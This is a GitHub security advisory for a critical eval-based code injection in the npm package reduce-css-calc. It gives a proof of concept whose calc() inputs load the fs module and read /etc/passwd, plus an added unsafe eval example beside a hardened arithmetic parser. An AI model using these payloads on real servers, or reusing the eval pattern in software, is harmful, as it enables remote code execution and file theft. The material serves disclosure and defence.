GHSA-4662-j96g-mv46

GitHub Security Advisory

Arbitrary Code Injection in reduce-css-calc

GitHub Reviewed · Severity: CRITICAL · Has CVE

Advisory Details

Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

## Proof of Concept

```js
// Each calc() body below is handed to eval by affected versions of reduce-css-calc.
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
```
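The root cause is that the text inside `calc(...)` reaches `eval`. The following added example (not code from reduce-css-calc or from the advisory) puts that unsafe pattern next to a hardened evaluator that only accepts numbers, `+ - * /`, unary minus and parentheses, so inputs like the three PoC strings above are rejected with an error instead of being executed.

```javascript
// Added example (not reduce-css-calc source): the advisory's bug class next to a safe evaluator.
// UNSAFE: whatever sits inside calc(...) runs as JavaScript, exactly the pattern in the PoC.
function unsafeCalc(expr) {
  return eval(expr.replace(/^\s*calc\((.*)\)\s*$/s, '$1')); // eslint-disable-line no-eval
}

// SAFE: recursive-descent parser for numbers, + - * /, unary minus and parentheses only.
// Any other token (identifiers, quotes, brackets, commas) throws; nothing is ever executed.
function safeCalc(expr) {
  const m = /^\s*calc\((.*)\)\s*$/s.exec(expr);
  if (!m) throw new Error('not a calc() expression');
  const src = m[1];
  let i = 0;
  const peek = () => { while (i < src.length && /\s/.test(src[i])) i++; return src[i]; };
  const fail = (what) => { throw new Error(`${what} at ${i}: ${JSON.stringify(src.slice(i, i + 12))}`); };
  function number() {
    peek(); // skip whitespace
    const n = /^\d+(\.\d+)?/.exec(src.slice(i));
    if (!n) fail('unexpected token');
    i += n[0].length;
    return parseFloat(n[0]);
  }
  function factor() {
    const c = peek();
    if (c === '(') { i++; const v = sum(); if (peek() !== ')') fail('expected )'); i++; return v; }
    if (c === '-') { i++; return -factor(); }
    return number();
  }
  function product() {
    let v = factor();
    for (let c = peek(); c === '*' || c === '/'; c = peek()) {
      i++;
      const r = factor();
      if (c === '/' && r === 0) fail('division by zero');
      v = c === '*' ? v * r : v / r;
    }
    return v;
  }
  function sum() {
    let v = product();
    for (let c = peek(); c === '+' || c === '-'; c = peek()) {
      i++;
      v = c === '+' ? v + product() : v - product();
    }
    return v;
  }
  const v = sum();
  if (peek() !== undefined) fail('trailing input');
  return v;
}
```

Running the PoC inputs through `safeCalc` throws at the first identifier character, which is the behaviour a fixed version should have for anything that is not plain arithmetic.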

## Recommendation

Update to version 1.2.5 or later.

Affected Packages

npm reduce-css-calc
Affected versions: 0 (fixed in 1.2.5)

Related CVEs

Key Information

GHSA ID
GHSA-4662-j96g-mv46
Published
June 7, 2018 7:43 PM
Last Modified
August 31, 2020 6:12 PM
CVSS Score
9.0 / 10
Primary Ecosystem
npm
Primary Package
reduce-css-calc
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 4, 2025 6:15 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.